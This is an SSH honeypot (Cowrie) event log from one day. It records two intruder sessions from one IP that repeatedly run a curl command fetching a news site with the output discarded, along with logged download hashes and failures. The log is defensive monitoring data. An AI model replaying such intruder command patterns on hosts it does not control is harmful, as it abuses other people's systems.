{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.007940Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.010786Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.017651Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.025016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.026206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.049055Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.050151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.073139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.074202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.082886Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.090890Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.095669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.096627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.098961Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.118970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.119991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.132489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.135983Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.136895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.140284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.155815Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.158041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.159002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.172875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.173967Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.195864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.196994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.209336Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.210344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.219749Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.223141Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.235718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.236617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.248586Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.250258Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.251331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.253630Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.293935Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.297434Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.370213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.371348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.375330Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.384303Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.385307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.414320Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.417866Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.438731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.439928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.445551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.446470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.474129Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.485662Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.486647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.489022Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.490374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.493114Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.511710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.520147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.527679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.528704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.530682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.532811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.533695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.542130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.551778Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.570289Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.573342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.574199Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.576661Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.577513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.580589Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.593565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.615804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.617157Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.622135Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.623144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.624845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.640957Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.650534Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.652771Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.687597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.708701Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.743845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.745485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.750889Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.752411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.790765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.791775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.801883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
